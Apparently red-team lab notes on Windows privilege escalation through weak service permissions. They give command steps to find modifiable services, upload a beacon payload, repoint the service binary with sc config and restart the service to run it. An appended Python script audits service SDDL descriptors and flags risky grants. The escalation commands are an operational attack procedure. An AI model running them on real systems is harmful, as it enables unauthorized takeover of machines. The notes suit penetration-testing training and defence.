Weak Service Permissions

Identify vulnerable services.

execute-assembly C:\Tools\SharpUp.exe audit ModifiableServices

Show the permissions of the services we can modify.

powershell-import c:\Tools\Get-ServiceACL.ps1
powershell Get-ServiceAcl -Name "Vulnerable Service 2" | select -expandproperty Access

Create a payload and upload it to the victim machine.

mkdir c:\Temp
cd c:\Temp
upload C:\Tools\Payloads\tcp_beacon_x64.exe
mv tcp_beacon_x64.exe Service2.exe

Configure the service.

run sc config "Vulnerable Service 2" binPath= C:\Temp\Service2.exe

Verify the service configuration.

run sc qc "Vulnerable Service 2"

Start the service.

run sc stop "Vulnerable Service 2"
run sc start "Vulnerable Service 2"

Connect to the beacon.

connect localhost 4444
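
The sc config step above only succeeds when the service DACL grants a low-privileged group a right such as SERVICE_CHANGE_CONFIG. As an added example (not part of the original notes), this Python script audits service security descriptors in the SDDL form printed by sc sdshow and flags such grants; the sample descriptors and the "Hardened Service" name are constructed.

```python
import re

# SDDL right codes (service-specific meaning) that let a trustee take over a service.
RISKY_CODES = {"DC": "SERVICE_CHANGE_CONFIG", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
               "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE"}
# The same rights as access-mask bits, for ACEs written in hex form.
RISKY_BITS = {0x2: "SERVICE_CHANGE_CONFIG", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
              0x10000000: "GENERIC_ALL", 0x40000000: "GENERIC_WRITE"}
# Broad, non-administrative trustees (SDDL aliases and their literal SIDs).
LOW_PRIV = {"WD": "Everyone", "S-1-1-0": "Everyone",
            "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
            "BU": "BUILTIN\\Users", "S-1-5-32-545": "BUILTIN\\Users",
            "IU": "INTERACTIVE", "S-1-5-4": "INTERACTIVE"}

def risky_rights(rights):
    """Return the sorted risky right names contained in an SDDL rights field."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return sorted(name for bit, name in RISKY_BITS.items() if mask & bit)
    codes = re.findall("..", rights)  # symbolic rights are two-letter codes
    return sorted(RISKY_CODES[c] for c in codes if c in RISKY_CODES)

def audit_service_sddl(sddl):
    """Return [(trustee, [rights])] for allow ACEs granting risky rights to broad groups."""
    # Only the DACL ("D:") is inspected; the SACL ("S:") holds audit ACEs, not grants.
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    aces = re.findall(r"\(([^)]*)\)", dacl.group(1)) if dacl else []
    findings = []
    for ace in aces:
        fields = ace.split(";")  # type;flags;rights;object;inherit_object;sid
        if len(fields) < 6 or fields[0] != "A":
            continue  # only access-allowed ACEs grant rights
        trustee, rights = fields[5], risky_rights(fields[2])
        if trustee in LOW_PRIV and rights:
            findings.append((LOW_PRIV[trustee], rights))
    return findings

# Constructed sample descriptors (not taken from a real host).
SAMPLES = {
    "Vulnerable Service 2": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                            "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "Hardened Service": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                        "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;AU)",
}

if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        print(name, "->", audit_service_sddl(sddl) or "no broad write access")
```

Any finding means the listed group can repoint the service binary or rewrite its DACL; removing that ACE from the service's security descriptor closes the path.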